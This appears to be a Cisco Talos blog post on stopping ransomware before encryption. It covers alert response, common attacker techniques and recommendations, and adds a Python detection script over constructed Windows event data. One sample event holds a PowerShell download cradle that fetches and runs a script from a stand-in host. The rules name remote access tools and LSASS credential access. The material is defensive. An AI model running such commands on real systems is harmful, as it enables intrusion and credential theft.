Stopping ransomware before it starts: Lessons from Cisco Talos Incident Response
- Over the past two and a half years (January 2023 through June 2025), Cisco Talos Incident Response (Talos IR) has responded to numerous engagements that we classified as pre-ransomware incidents.
- Talos looked back to analyze what key security measures were credited with deterring ransomware deployment in each pre-ransomware engagement, finding that the top two factors were swift engagement with the incident response team and rapid actioning of alerts from security solutions (predominantly within two hours of the alert).
- We also classified almost two dozen observed pre-ransomware indicators in these engagements, as the top observed tactics provide insight into what malicious activity frequently precedes a more severe attack. Finally, we analyzed Talos IR’s most frequent recommendations to customers to ascertain common security gaps.
- Aggregation of this data and the follow-on analysis is intended to provide actionable guidance that can assist organizations in improving their defenses against ransomware activity.
What characterizes an incident as “pre-ransomware?”
Talos IR associates specific adversary actions with pre-ransomware activity. When threat actors attempt to gain enterprise-level domain administrator access, they often conduct a series of account pivots and escalations, deploy command-and-control (C2) or other remote access solutions, harvest credentials and/or deploy automation to modify the operating system. Though the specific tools or elements in the attack chain vary by adversary, Talos IR has seen these same classic steps in practice for years. These actions, along with observed indicators of compromise (IOCs) or tactics, techniques and procedures (TTPs) that we associate with known ransomware threats, without the end result of enterprise-wide encryption, lead us to categorize an incident as “pre-ransomware.”
It is worth noting that some of the above attack techniques are also often deployed by initial access brokers (IABs), who seek to gain and sell access to compromised systems, so some of the incidents in this case study could have been perpetrated by IABs instead of ransomware operators. While it is often challenging to determine a threat actor’s end goal, we have high confidence that all incidents involved tactics that are consistently seen preceding ransomware deployment. If the adversary was instead an IAB, we have seen these types of IAB campaigns very frequently result in a ransomware attack after access has been sold, rendering the activity relevant to this analysis.
Key security actions and measures that deter ransomware deployment
Talos analyzed incident response engagements spanning the past two and a half years that we categorized as pre-ransomware attacks, identifying actions and security measures that we assessed were key in halting adversaries’ attack chains before encryption. An overview of our findings can be found in Figure 1, followed by a more thorough breakdown of each category to explore exactly how certain actions impeded ransomware execution.

Swift engagement of Talos IR
Engaging Talos IR within one to two days of first observed adversary activity (though we advise engagement as quickly as possible) was credited with preventing a more serious ransomware attack in approximately a third of engagements, providing benefits such as:
- Extensive knowledge of the threat landscape: In multiple engagements, Talos IR was able to correlate TTPs and IOCs on customers’ networks with other ransomware and pre-ransomware engagements we had responded to, identifying when the infection was part of a larger, widespread campaign. This insight helped Talos IR anticipate and intercept adversaries’ next steps as well as provide customers additional IOCs to block that were seen in other engagements.
- Actionable recommendations for isolation and remediation: In some engagements, the customers quickly acted on Talos’ pre-ransomware security guide, which Talos IR assessed prevented more catastrophic events.
- Enhanced monitoring: The Cisco Extended Detection and Response (Cisco XDR) team can provide extra vigilance in their monitoring after containment of the pre-ransomware threat to ensure full eradication.
We observed numerous incidents where Talos IR was not engaged by the customer immediately, which enabled the adversary to continue working through their attack chain and conduct data theft and/or ransomware deployment. This often results in consequences such as backup files being corrupted or encrypted, endpoint detection and response (EDR) and other security tools being disabled, disruption to day-to-day operations and more.
EDR/MDR alert prompted security teams’ rapid containment
Vigilant monitoring of security solutions and logs allows network administrators to act quickly when a threat is first detected, isolate the malicious activity and cut off threat actors’ ability to escalate their attack. In our case study, action from the security team within two hours of an alert from the organization’s EDR or managed detection and response (MDR) solution correlated with successful isolation of the threat in almost a third of engagements. Some of the observed alerts that prompted swift response in pre-ransomware engagements included, amongst others:
- Attempted connections to blocked domains
- Brute force activity
- PowerShell download cradle
- Deviations from expected baseline activity as determined by the organization
- Newly created domain administrator accounts
- Successful connections to an unknown external public IP address
- Reconnaissance activity, including shell access and user discovery commands such as whoami
- Modification of multi-factor authentication (MFA) tooling to provide bypass tokens
- Modification of an account to be exempt from MFA requirements
USG and/or other partners notified on ransomware staging
In almost 15 percent of engagements, targeted organizations were able to get ahead of the threat to their environment due to notification from U.S. government (USG) partners or representatives of their managed service provider (MSP) about possible ransomware staging in their environment. In particular, the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) has launched an initiative to provide early warnings about potential ransomware attacks, aiming to help organizations detect threats and evict actors before significant damage occurs. CISA’s intelligence predominantly derives from its partnerships with the cybersecurity research community, infrastructure providers and cyber threat intelligence companies.
Security solutions configured to block and quarantine malicious activity
In over 10 percent of Talos IR engagements, customers’ security solutions actively blocked and/or quarantined malicious executables, effectively stopping adversaries’ attack chains in their tracks.
Talos often observes organizations deploying endpoint protection technology in a passive, audit-only manner, meaning the product raises alerts to the user but does not block or quarantine. This configuration puts organizations at unnecessary risk, and Talos IR has responded to multiple engagements where passive deployment enabled threat actors to execute malware, including ransomware. A configuration that blocks and quarantines on detection impeded ransomware deployment in this case study, underscoring its importance.
Robust security restrictions prevented access to key resources
Based on our analysis, organizations’ robust security restrictions were key in impeding ransomware actors’ attack chains in nine percent of engagements. For example, in one engagement, the threat actors compromised a service account at the targeted organization, but appropriate privilege restrictions on the account prevented their attempts to access key systems like domain controllers.
Also of note, organizations who implemented thorough logging and/or had a SIEM in place to aggregate event data were able to provide Talos with forensic visibility to determine the exact chain of events and where additional security measures could be implemented. When an organization lacks these records, it can be challenging to identify the precise security weaknesses that enabled threat activity.
Most observed pre-ransomware indicators
Upon categorizing TTPs observed in this case study per the MITRE ATT&CK framework, Talos found that the following in Figure 2 were most frequently seen across engagements.

We dove deeper into some of the top attack techniques and found the following:
- Remote Services: Talos IR frequently saw remote services such as RDP, PsExec and PowerShell leveraged by adversaries.
- Remote Access Software: Frequently seen remote access software included AnyDesk, Atera, Microsoft Quick Assist and Splashtop.
- OS Credential Dumping: Top observed credential dumping techniques/locations included the domain controller registry, the SAM registry hive, AD Explorer, LSASS and NTDS.DIT. Mimikatz was also frequently used.
- Network Service Discovery: Top observed tools and commands used for network service discovery included netscan, nltest and netview.
The top observed TTPs serve as a reminder to security teams of what malicious activity often precedes a more severe attack. For example, prioritizing restrictions on the use of remote services and remote access software, and/or hardening the credential stores listed above, would have constrained the majority of adversaries seen in these pre-ransomware engagements.
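As an added example (not code from the Talos post or from Talos IR), the following Python script runs a small set of detection rules over a constructed sequence of Windows Security and Sysmon events that mirrors both the alerts listed under “EDR/MDR alert prompted security teams’ rapid containment” and the top TTPs above: a burst of failed logons, a PowerShell download cradle, whoami and nltest discovery, an AnyDesk launch, a non-system process opening LSASS, and an account being added to Domain Admins. The event IDs (4625, 4728, 4104, Sysmon 1 and 10) are the real ones, but the event dictionaries, the brute-force threshold, the LSASS access allow-list and the remote access binary names are assumptions for illustration and should be tuned to the products and baseline in your own estate.

```python
"""Toy triage pass over Windows Security / Sysmon events.

Each rule corresponds to an indicator named in the Talos write-up. Event
records are simplified dicts (not real EVTX), and the sample data below is
constructed for illustration.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events: a plausible pre-ransomware sequence, not real telemetry.
SAMPLE_EVENTS = [
    {"ts": "2025-03-01T08:00:01", "id": 4625, "src_ip": "198.51.100.7", "user": "jsmith"},
    {"ts": "2025-03-01T08:00:02", "id": 4625, "src_ip": "198.51.100.7", "user": "jsmith"},
    {"ts": "2025-03-01T08:00:03", "id": 4625, "src_ip": "198.51.100.7", "user": "admin"},
    {"ts": "2025-03-01T08:00:04", "id": 4625, "src_ip": "198.51.100.7", "user": "admin"},
    {"ts": "2025-03-01T08:00:05", "id": 4625, "src_ip": "198.51.100.7", "user": "svc_backup"},
    {"ts": "2025-03-01T08:00:06", "id": 4625, "src_ip": "198.51.100.7", "user": "svc_backup"},
    {"ts": "2025-03-01T09:10:00", "id": 4104, "host": "WS01",
     "script": "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/a.ps1')"},
    {"ts": "2025-03-01T09:11:00", "id": 1, "host": "WS01",
     "image": r"C:\Windows\System32\whoami.exe", "cmdline": "whoami /all"},
    {"ts": "2025-03-01T09:11:30", "id": 1, "host": "WS01",
     "image": r"C:\Windows\System32\nltest.exe", "cmdline": "nltest /dclist:corp"},
    {"ts": "2025-03-01T09:15:00", "id": 1, "host": "WS01",
     "image": r"C:\Users\jsmith\Downloads\AnyDesk.exe", "cmdline": "AnyDesk.exe --silent"},
    {"ts": "2025-03-01T09:40:00", "id": 10, "host": "WS01", "source_image": r"C:\Temp\m.exe",
     "target_image": r"C:\Windows\System32\lsass.exe", "granted_access": "0x1010"},
    {"ts": "2025-03-01T10:05:00", "id": 4728, "host": "DC01",
     "member": "CORP\\svc_backup", "group": "Domain Admins"},
    {"ts": "2025-03-01T10:06:00", "id": 1, "host": "DC01",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
]

# Thresholds and name lists are assumptions; tune them to your environment.
BRUTE_FORCE_THRESHOLD = 5            # failed logons from one source ...
BRUTE_FORCE_WINDOW = timedelta(minutes=5)  # ... within this window
DOWNLOAD_CRADLE = re.compile(
    r"(IEX|Invoke-Expression).*(DownloadString|DownloadFile|Invoke-WebRequest)"
    r"|(DownloadString|DownloadFile|Invoke-WebRequest).*(IEX|Invoke-Expression)",
    re.IGNORECASE,
)
DISCOVERY_BINARIES = {"whoami.exe", "nltest.exe", "net.exe", "net1.exe", "netview.exe", "netscan.exe"}
REMOTE_ACCESS_BINARIES = {"anydesk.exe", "ateraagent.exe", "quickassist.exe", "srserver.exe"}
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}
# Assumed baseline of processes expected to open LSASS; everything else is flagged.
LSASS_ALLOWED_SOURCES = {r"c:\windows\system32\csrss.exe", r"c:\windows\system32\wininit.exe"}


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def detect(events):
    """Return (rule, detail) findings for the indicators described in the post."""
    findings = []
    failures = defaultdict(list)  # src_ip -> timestamps of recent 4625 events
    for ev in sorted(events, key=lambda e: e["ts"]):
        ts = datetime.fromisoformat(ev["ts"])
        eid = ev["id"]
        if eid == 4625:  # failed logon: sliding-window brute force detection
            window = failures[ev["src_ip"]]
            window.append(ts)
            while window and ts - window[0] > BRUTE_FORCE_WINDOW:
                window.pop(0)
            if len(window) == BRUTE_FORCE_THRESHOLD:  # fire once when the threshold is hit
                findings.append(("brute_force", ev["src_ip"]))
        elif eid == 4728 and ev["group"] in PRIVILEGED_GROUPS:  # member added to a privileged group
            findings.append(("new_privileged_member", f"{ev['member']} -> {ev['group']}"))
        elif eid == 4104 and DOWNLOAD_CRADLE.search(ev["script"]):  # PowerShell script block
            findings.append(("powershell_download_cradle", ev["host"]))
        elif eid == 1:  # Sysmon process creation
            name = basename(ev["image"])
            if name in DISCOVERY_BINARIES:
                findings.append(("discovery_command", ev["cmdline"]))
            elif name in REMOTE_ACCESS_BINARIES:
                findings.append(("remote_access_software", ev["image"]))
        elif eid == 10 and basename(ev["target_image"]) == "lsass.exe":  # Sysmon process access
            if ev["source_image"].lower() not in LSASS_ALLOWED_SOURCES:
                findings.append(("lsass_access", ev["source_image"]))
    return findings


if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_EVENTS):
        print(f"{rule:28s} {detail}")
```

Run stand-alone it prints seven findings in time order, from the brute-force burst through to the Domain Admins change. The point of the ordering is the one the post makes about the two-hour window: every finding here lands well before the group change on the domain controller, so acting on the first alert would have cut the chain off early.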
Observed security gaps and prevalent Talos IR recommendations
Talos IR crafts security recommendations for customers in each incident upon analyzing the environment and the adversary’s attack chain to help address any existing security weaknesses. Our most frequent recommendations include:
- Bring all operating systems and software patching up to date.
- Store backups offline.
- Configure security solutions to permit only proven benign applications to launch and prevent the installation of unexpected software.
- Require MFA on all critical services, including remote access and identity access management (IAM) services, and monitor for MFA misuse.
- Deploy Sysmon for enhanced endpoint visibility and logging.
- Implement meaningful firewall rules for both inbound and outbound traffic to block protocols that adversaries could otherwise use for C2 or data exfiltration.
- Implement robust network segmentation to minimize lateral movement and reduce the attack surface, ensuring valuable assets such as domain controllers do not connect directly to the internet aside from critical functions.
- Establish or intensify end-user cybersecurity training on social engineering tactics, including coverage of recently popularized attacks such as MFA fatigue attacks and adversary-in-the-middle (AiTM) token phishing attacks.
Source: Cisco Talos Blog